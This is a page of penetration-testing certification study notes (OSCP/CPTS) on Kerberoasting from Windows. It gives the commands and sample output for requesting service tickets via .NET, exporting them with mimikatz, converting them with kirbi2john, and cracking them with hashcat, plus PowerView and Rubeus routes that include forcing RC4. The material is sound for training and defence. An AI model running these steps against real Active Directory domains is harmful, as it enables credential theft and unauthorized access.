OSCP-CPTS NOTES
TwitterGithubLinkedinInstagramDiscord
  • oscp-cpts-notes
  • Pivoting & Tunneling
    • Local Port Forwarding
    • Remote Port Forwarding
    • Dynamic Port Forwarding
    • Ligolo-ng
  • Linux Privilege Escalation
    • Gathering Information of the System
    • Capabilities
    • Group Based
    • SUID Privilege Escalation
    • Cron Job
    • Exploiting NFS weak Permission
    • Sudo + LD_PRELOAD (Shared Libraries)
    • Shared Object Manipulation
    • Python Library Hijacking
  • Windows Privilege Escalation
    • Gathering Information of the System
    • User Privileges
      • SeImpersonatePrivilege and SeAssignPrimaryToken
      • SeDebugPrivilege
      • SeTakeOwnershipPrivilege
    • Group Privileges
      • Backup Operators
      • DnsAdmins
      • Server Operators
      • Always Install Elevated
      • Print Operators
      • Event Log Readers
      • Hyper-V Administrators
    • Credential Theft
  • Active Directory Attacks
    • Enumeration
    • Initial Foothold
    • Gathering Users & Password Policies
    • Password Spraying
    • Credentialed Enumeration From Linux
    • Credentialed Enumeration From Windows
    • Kerberoasting - From Linux
    • Kerberoasting - From Windows
  • Beyond OSCP - CPTS
    • RED TEAMING
      • Windows Local Persistence
        • Tampering With Unprivileged Accounts
        • Backdooring Files
        • Abusing Services
        • Abusing Scheduled Tasks
        • Logon Triggered Persistence
        • Backdooring the Login Screen / RDP
        • Persisting Through Existing Services
Powered by GitBook
On this page
  • Semi Manual Method
  • Automated / Tool Based Route

Was this helpful?

Edit on GitHub
  1. Active Directory Attacks

Kerberoasting - From Windows

PreviousKerberoasting - From LinuxNextRED TEAMING

Last updated 1 month ago

Was this helpful?

Semi Manual Method

  • C:\> setspn.exe -Q */* → lists various available SPNs

  • PS C:\> Add-Type -AssemblyName System.IdentityModel

  • PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL:1433"

    • The cmdlet is used to add a .NET framework class to our PowerShell session, which can then be instantiated like any .NET framework object

    • The AssemblyName parameter allows us to specify an assembly that contains types that we are interested in using

    • is a namespace that contains different classes for building security token services

    • We'll then use the cmdlet to create an instance of a .NET Framework object

    • We'll use the namespace with the class to create a security token and pass the SPN name to the class to request a Kerberos TGS ticket for the target account in our current logon session

We are requesting TGS tickets for an account and load them into memory to later extract using Mimikatz

  • PS C:\> setspn.exe -T DOMAIN.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } → request tickets for all accounts with SPNs set.

Now lets extract tickets from mimikatz

Using 'mimikatz.log' for logfile : OK

mimikatz # base64 /out:true
isBase64InterceptInput  is false
isBase64InterceptOutput is true

mimikatz # kerberos::list /export

<SNIP>

[00000002] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 2/24/2022 3:36:22 PM ; 2/25/2022 12:55:25 AM ; 3/3/2022 2:55:25 PM
   Server Name       : MSSQLSvc/DEV-PRE-SQL:1433 @ DOMAIN.LOCAL
   Client Name       : USERNAME @ DOMAIN.LOCAL
   Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
====================
Base64 of file : 2-40a10000-USERNAME@MSSQLSvc~DEV-PRE-SQL~1433-DOMAIN.LOCAL.kirbi
====================
doIGPzCCBjugAwIBBaEDAgEWooIFKDCCBSRhggUgMIIFHKADAgEFoRUbE0lOTEFO
RUZSRUlHSFQuTE9DQUyiOzA5oAMCAQKhMjAwGwhNU1NRTFN2YxskREVWLVBSRS1T
UUwuaW5sYW5lZnJlaWdodC5sb2NhbDoxNDMzo4IEvzCCBLugAwIBF6EDAgECooIE
<...................SNIP...................>
LkxPQ0FMqTswOaADAgECoTIwMBsITVNTUUxTdmMbJERFVi1QUkUtU1FMLmlubGFu
ZWZyZWlnaHQubG9jYWw6MTQzMw==
====================

   * Saved to file     : 2-40a10000-USERNAME@MSSQLSvc~DEV-PRE-SQL~1433-DOMAIN.LOCAL.kirbi

<SNIP>

if we do not specify base64 /out:true , mimikatz will extract the tickets and write them to .kirbi files

  • decode this base64 Blob and save into file sqldev.kirbi

  • then use kirbi2john to extract Kerberos Ticket.

  • sed 's/\$krb5tgs\$(.*):\(.*\)/\$krb5tgs\$23\$\1\$\2/' crack_file > sqldev_tgs_hashcat → modify the file/hash for Hashcat

    **$**krb5tgs$23$sqldev.kirbi$813149fb261549a6a1b38e71a057feeab → it will look something like this

  • hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt → finally cracking the hash.

Automated / Tool Based Route

  • setspn.exe -Q */* → list available spns

Using PowerView

  • PS C:\> Import-Module .\PowerView.ps1 → importing powerview

  • PS C:\> Get-DomainUser * -spn | select samaccountname → getting spn account

  • PS C:\> Get-DomainUser -Identity username | Get-DomainSPNTicket -Format Hashcat → Targeting Specific User

  • PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation → Exporting All tickets to csv file

Using Rubeus

Rubeus does not need us to explicitly set the SPN or the user.

  • PS C:\> .\Rubeus.exe kerberoast /stats → get the stats

  • PS C:\> .\Rubeus.exe kerberoast

    we can add flag /nowrap so that hash will not be wrapped in any form so it will be easier to crack using hashcat.

    also we can use /outfile:filename to save the ticket, instead of displaying it.

  • PS C:\> .\Rubeus.exe kerberoast /user:testspn /nowrap → for specific user.

we can use /tgtdeleg flag to specify that we want only RC4 encryption when requesting a new service ticket.

RC4 is easier to crack compared to AES 256 and 128

Add-Type
System.IdentityModel
New-Object
System.IdentityModel.Tokens
KerberosRequestorSecurityToken